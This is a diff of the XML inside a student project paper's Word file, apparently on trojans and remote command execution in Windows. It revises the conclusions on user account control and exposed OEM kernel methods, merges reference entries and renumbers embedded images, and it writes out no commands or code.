+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>t is evident th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at, although most actions in the system within the frame of reference require administrative level authorization, there should be a stricter </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">implementation of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>user account control</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>_____________________________________________________________________________________</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>4 CONCLUSIONS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="20"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">system </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="20"/>
         </w:rPr>
+        <w:t>present in Microsoft Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>, such</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as in some scenarios </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>wherein</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> execution of a specific command should have been blocked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>, but</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it was still process</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and executed by the OS with no doubt in the executing authority.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
         <w:tab/>
-        <w:t>In conclusion of this experiment</w:t>
+        <w:t xml:space="preserve">On the other hand, although it is good that </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>original equipment manufacturer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>it is evident th</w:t>
+        <w:t xml:space="preserve">s allow programmers to make use of methods found in their libraries, especially some methods used by the kernel to interpret input from external </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">at, although most actions in the system within the frame of reference require administrative level authorization, there should be a stricter </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">implementation of the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>user account control</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">system </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>present in Microsoft Windows as in some scenarios in where execution of a specific command should have been blocked it was still process and executed by the O.S. with no doubt in the executing authority.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>On the other hand, although it is good that OEMs allow programmers to make use of methods found in their libraries, especially some methods used by the kernel to interpret input from external devices, it is also evident that the act of allowing access to such methods could easily lead to attacks and misuse as exposing these methods allow the said programmer full control of them.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>devices, it is also evident that the act of allowing access to such methods could easily lead to attacks and misuse as exposing these methods allow the said programmer full control of them.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5781,6 +6902,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>https://www.webopedia.com/DidYouKnow/Internet/virus.asp</w:t>
         </w:r>
@@ -5801,6 +6924,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>https://en.wikipedia.org/wiki/Trojan_horse_(computing)</w:t>
         </w:r>
@@ -5827,6 +6952,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://blog.spamfighter.com/malware-2/5-reasons-why-trojan-is-such-a-dangerous-threat.html</w:t>
         </w:r>
@@ -5842,6 +6969,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://blog.spamfighter.com/malware-2/5-reasons-why-trojan-is-such-a-dangerous-threat.html</w:t>
         </w:r>
@@ -5892,19 +7021,15 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">[5] </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Babar Bashir Chohan. 2017. Transmission Control Protocol. (November 2017). Retrieved March 2, 2018 from </w:t>
+        <w:t xml:space="preserve">[5] Babar Bashir Chohan. 2017. Transmission Control Protocol. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
       <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>https://en.wikipedia.org/wiki/Transmission_Control_Protocol</w:t>
         </w:r>
@@ -5927,20 +7052,15 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">[6] </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Esmond Pitt. 2017. User Datagram Protocol. (April 2017). Retrieved March 2, 2018 from </w:t>
+        <w:t xml:space="preserve">[6] Esmond Pitt. 2017. User Datagram Protocol. (April 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
       <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>https://en.wikipedia.org/wiki/User_Datagram_Protocol</w:t>
         </w:r>
@@ -5963,15 +7083,14 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">[7] </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ForensicsWiki. 2015. Netcat. (March 2015). Retrieved March 1, 2018 from </w:t>
+        <w:t xml:space="preserve">[7] ForensicsWiki. 2015. Netcat. (March 2015). Retrieved March 1, 2018 from </w:t>
       </w:r>
       <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://www.forensicswiki.org/wiki/Netcat</w:t>
         </w:r>
@@ -5985,15 +7104,14 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">[8] </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Guy Harris. 2017. Command-line interface. (November 2017). Retrieved March 2, 2018 from </w:t>
+        <w:t xml:space="preserve">[8] Guy Harris. 2017. Command-line interface. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
       <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:color w:val="auto"/>
+            <w:u w:val="none"/>
           </w:rPr>
           <w:t>https://en.wikipedia.org/wiki/Command-line_interface</w:t>
         </w:r>
@@ -6003,6 +7121,9 @@
       </w:r>
     </w:p>
     <w:sectPr>
+      <w:endnotePr>
+        <w:numFmt w:val="decimal"/>
+      </w:endnotePr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -6793,7 +7914,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -6893,6 +8013,45 @@
     <w:link w:val="Footer"/>
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="00AB7016"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="EndnoteText">
+    <w:name w:val="endnote text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="EndnoteTextChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004E0C99"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
+    <w:name w:val="Endnote Text Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="EndnoteText"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="004E0C99"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="EndnoteReference">
+    <w:name w:val="endnote reference"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004E0C99"/>
+    <w:rPr>
+      <w:vertAlign w:val="superscript"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -7163,7 +8322,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B8F2C240-6701-4FB9-AA33-00579A401CB9}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B7D0B8AB-241E-4CEE-87E1-1C01F46403E5}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/OSproject_r1/IT154_Project_Article.docx
+++ b/OSproject_r1/IT154_Project_Article.docx
@@ -1963,7 +1963,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId8">
+                                    <a:blip r:embed="rId9">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2111,7 +2111,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId9">
+                                          <a:blip r:embed="rId10">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2235,7 +2235,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId9">
+                                    <a:blip r:embed="rId11">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2589,7 +2589,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId10">
+                                          <a:blip r:embed="rId12">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2706,7 +2706,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId10">
+                                    <a:blip r:embed="rId13">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3056,7 +3056,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId11">
+                                          <a:blip r:embed="rId14">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3173,7 +3173,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId11">
+                                    <a:blip r:embed="rId15">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3559,7 +3559,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId12">
+                                          <a:blip r:embed="rId16">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3676,7 +3676,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId12">
+                                    <a:blip r:embed="rId17">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4026,7 +4026,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId13">
+                                          <a:blip r:embed="rId18">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4137,7 +4137,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId13">
+                                    <a:blip r:embed="rId19">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4300,7 +4300,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId14">
+                                          <a:blip r:embed="rId20">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4411,7 +4411,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId14">
+                                    <a:blip r:embed="rId21">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4936,7 +4936,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId15">
+                                          <a:blip r:embed="rId22">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5047,7 +5047,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId15">
+                                    <a:blip r:embed="rId23">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5363,7 +5363,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId16">
+                                          <a:blip r:embed="rId24">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5477,7 +5477,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId16">
+                                    <a:blip r:embed="rId25">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5654,7 +5654,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId17">
+                                          <a:blip r:embed="rId26">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5765,7 +5765,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId17">
+                                    <a:blip r:embed="rId27">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6080,43 +6080,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>, which does not mean that the machine must be connected to the Internet,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">and the I.P. address of the remote machine </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> work.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>In conjunction with t</w:t>
+        <w:t xml:space="preserve">, which does not mean that the machine must be connected to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>a local area network</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
@@ -6124,7 +6094,43 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">his, the above-mentioned command executes the following the </w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">and the I.P. address of the remote machine </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> work.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
